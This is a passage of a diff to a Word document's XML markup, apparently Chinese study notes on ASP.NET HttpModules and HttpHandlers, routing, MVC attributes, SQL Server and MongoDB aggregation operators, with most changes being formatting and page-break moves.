+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>ASP.NET</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:color w:val="0070C0"/>
+          <w:szCs w:val="20"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>的拓展性</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:szCs w:val="20"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>呢？</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:szCs w:val="20"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>HttpModule</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:szCs w:val="20"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>功不可没。</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="10"/>
+        <w:ind w:left="90"/>
+        <w:rPr>
+          <w:szCs w:val="20"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:szCs w:val="20"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>以下一些就是典型的</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:szCs w:val="20"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>HTTPModule</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:szCs w:val="20"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>基础功能：</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="10"/>
+        <w:ind w:left="90"/>
+        <w:rPr>
+          <w:szCs w:val="20"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:szCs w:val="20"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>OutputCacheModule</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:szCs w:val="20"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>：实现了输出缓存功能</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="10"/>
+        <w:ind w:left="90"/>
+        <w:rPr>
+          <w:szCs w:val="20"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:szCs w:val="20"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>SessionStateModule</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:szCs w:val="20"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>：在无状态的</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:szCs w:val="20"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>HTTP</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:szCs w:val="20"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>协议上实现了基于会话（</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:szCs w:val="20"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>Session</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:szCs w:val="20"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>）的状态保存。</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="10"/>
+        <w:ind w:left="90"/>
+        <w:rPr>
+          <w:szCs w:val="20"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:szCs w:val="20"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>WindowsAuthentication + FormsAuthentication + PassportAuthentication Module</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:szCs w:val="20"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>：实现了</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:szCs w:val="20"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>Windows</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:szCs w:val="20"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>，</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:szCs w:val="20"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>Forms</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:szCs w:val="20"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>和</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:szCs w:val="20"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>Passport</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:szCs w:val="20"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>这三种典型的身份认证方式。</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="10"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="174"/>
+        </w:numPr>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
+          <w:b/>
+          <w:color w:val="0070C0"/>
+          <w:szCs w:val="20"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -11277,7 +11801,7 @@
           <w:szCs w:val="20"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
-        <w:t>HttpModule</w:t>
+        <w:t>HttpHandler</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -11285,298 +11809,6 @@
         <w:pStyle w:val="10"/>
         <w:ind w:left="90"/>
         <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-          <w:szCs w:val="20"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-          <w:szCs w:val="20"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t>ASP.NET</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-          <w:szCs w:val="20"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t>拥有一个具有高度可拓展性的引擎，并且能够处理对于不同资源类型的请求。那么是什么成就了</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-          <w:color w:val="0070C0"/>
-          <w:szCs w:val="20"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t>ASP.NET</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-          <w:color w:val="0070C0"/>
-          <w:szCs w:val="20"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t>的拓展性</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-          <w:szCs w:val="20"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t>呢？</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-          <w:szCs w:val="20"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t>HttpModule</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-          <w:szCs w:val="20"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t>功不可没。</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="10"/>
-        <w:ind w:left="90"/>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-          <w:szCs w:val="20"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-          <w:szCs w:val="20"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t>以下一些就是典型的</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-          <w:szCs w:val="20"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t>HTTPModule</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-          <w:szCs w:val="20"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t>基础功能：</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="10"/>
-        <w:ind w:left="90"/>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-          <w:szCs w:val="20"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-          <w:szCs w:val="20"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t>OutputCacheModule</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-          <w:szCs w:val="20"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t>：实现了输出缓存功能</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="10"/>
-        <w:ind w:left="90"/>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-          <w:szCs w:val="20"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-          <w:szCs w:val="20"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t>SessionStateModule</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-          <w:szCs w:val="20"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t>：在无状态的</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-          <w:szCs w:val="20"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t>HTTP</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-          <w:szCs w:val="20"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t>协议上实现了基于会话（</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-          <w:szCs w:val="20"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t>Session</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-          <w:szCs w:val="20"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t>）的状态保存。</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="10"/>
-        <w:ind w:left="90"/>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-          <w:szCs w:val="20"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-          <w:szCs w:val="20"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t>WindowsAuthentication + FormsAuthentication + PassportAuthentication Module</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-          <w:szCs w:val="20"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t>：实现了</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-          <w:szCs w:val="20"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t>Windows</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-          <w:szCs w:val="20"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t>，</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-          <w:szCs w:val="20"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t>Forms</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-          <w:szCs w:val="20"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t>和</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-          <w:szCs w:val="20"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t>Passport</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-          <w:szCs w:val="20"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t>这三种典型的身份认证方式。</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="10"/>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="174"/>
-        </w:numPr>
-        <w:rPr>
-          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
-          <w:b/>
-          <w:color w:val="0070C0"/>
-          <w:szCs w:val="20"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
-          <w:b/>
-          <w:color w:val="0070C0"/>
-          <w:szCs w:val="20"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t>HttpHandler</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="10"/>
-        <w:ind w:left="90"/>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
           <w:szCs w:val="20"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
@@ -11807,7 +12039,6 @@
         <w:pStyle w:val="10"/>
         <w:ind w:left="90"/>
         <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
           <w:szCs w:val="20"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
@@ -11818,7 +12049,6 @@
         <w:pStyle w:val="10"/>
         <w:ind w:left="90"/>
         <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
           <w:szCs w:val="20"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
@@ -11828,21 +12058,22 @@
       <w:pPr>
         <w:pStyle w:val="10"/>
         <w:outlineLvl w:val="2"/>
-        <w:rPr>
-          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
-          <w:b/>
-          <w:color w:val="0070C0"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
         <w:rPr>
           <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
           <w:b/>
           <w:color w:val="0070C0"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:lastRenderedPageBreak/>
+          <w:sz w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
+          <w:b/>
+          <w:color w:val="0070C0"/>
+          <w:sz w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
         <w:t>Routing路由</w:t>
       </w:r>
     </w:p>
@@ -11850,7 +12081,7 @@
       <w:pPr>
         <w:pStyle w:val="10"/>
         <w:rPr>
-          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
+          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
       </w:pPr>
@@ -12357,9 +12588,6 @@
           <w:numId w:val="21"/>
         </w:numPr>
         <w:ind w:left="1350"/>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -12548,7 +12776,6 @@
           <w:szCs w:val="20"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
         <w:t>ValidateAntiForgeryTokenAttribute</w:t>
       </w:r>
     </w:p>
@@ -12569,6 +12796,7 @@
           <w:szCs w:val="20"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:t>ChildActionOnlyAttribute</w:t>
       </w:r>
     </w:p>
@@ -13782,7 +14010,6 @@
           <w:szCs w:val="20"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
         <w:t>种类、粒度、加锁方式</w:t>
       </w:r>
     </w:p>
@@ -13973,6 +14200,7 @@
           <w:szCs w:val="20"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:t>数据库辅助工具：</w:t>
       </w:r>
       <w:r>
@@ -14275,7 +14503,6 @@
         <w:br/>
       </w:r>
       <w:r>
-        <w:lastRenderedPageBreak/>
         <w:t>来源：知乎</w:t>
       </w:r>
       <w:r>
@@ -14427,6 +14654,7 @@
           <w:b/>
           <w:bCs/>
         </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:t>服务器操作系统</w:t>
       </w:r>
     </w:p>
@@ -15058,7 +15286,6 @@
           <w:b/>
           <w:bCs/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
         <w:t>服务器端脚本</w:t>
       </w:r>
     </w:p>
@@ -15255,6 +15482,7 @@
         <w:jc w:val="left"/>
       </w:pPr>
       <w:r>
+        <w:lastRenderedPageBreak/>
         <w:t>Microsoft SQL Server 2014</w:t>
       </w:r>
       <w:r>
@@ -16367,6 +16595,7 @@
               <w:rPr>
                 <w:rFonts w:hint="eastAsia"/>
               </w:rPr>
+              <w:lastRenderedPageBreak/>
               <w:t>Index</w:t>
             </w:r>
           </w:p>
@@ -16820,7 +17049,6 @@
         <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
         <w:t>并且</w:t>
       </w:r>
       <w:r>
@@ -17741,6 +17969,7 @@
         <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
         </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:t>改值</w:t>
       </w:r>
       <w:r>
@@ -17927,7 +18156,6 @@
           <w:szCs w:val="21"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
         <w:t>求当前时间 =&gt; $currentDate：{$currentDate:{&lt;field&gt;:}}</w:t>
       </w:r>
     </w:p>
@@ -18991,7 +19219,6 @@
         <w:widowControl/>
       </w:pPr>
       <w:r>
-        <w:lastRenderedPageBreak/>
         <w:t>R</w:t>
       </w:r>
       <w:r>
@@ -20179,148 +20406,148 @@
         <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
         </w:rPr>
+        <w:t>}</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>}</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>具体解释：</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl/>
+      </w:pPr>
+      <w:r>
+        <w:t>E</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>xpression</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>：我们可以使用“</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>$</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>属性名”或“</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>$</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>属性名</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>属性名</w:t>
+      </w:r>
+      <w:r>
+        <w:t>…</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>”来表示一个字段</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl/>
+      </w:pPr>
+      <w:r>
+        <w:t>A</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>ccumulator</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>：累计运算符有很多中，常见的有</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>$avg,$first,$last,$max,$min,$sum</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>等。</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl/>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
         <w:lastRenderedPageBreak/>
-        <w:t>}</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:widowControl/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-        <w:t>}</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:widowControl/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-        <w:t>具体解释：</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:widowControl/>
-      </w:pPr>
-      <w:r>
-        <w:t>E</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-        <w:t>xpression</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-        <w:t>：我们可以使用“</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-        <w:t>$</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-        <w:t>属性名”或“</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-        <w:t>$</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-        <w:t>属性名</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-        <w:t>.</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-        <w:t>属性名</w:t>
-      </w:r>
-      <w:r>
-        <w:t>…</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-        <w:t>.</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-        <w:t>”来表示一个字段</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:widowControl/>
-      </w:pPr>
-      <w:r>
-        <w:t>A</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-        <w:t>ccumulator</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-        <w:t>：累计运算符有很多中，常见的有</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
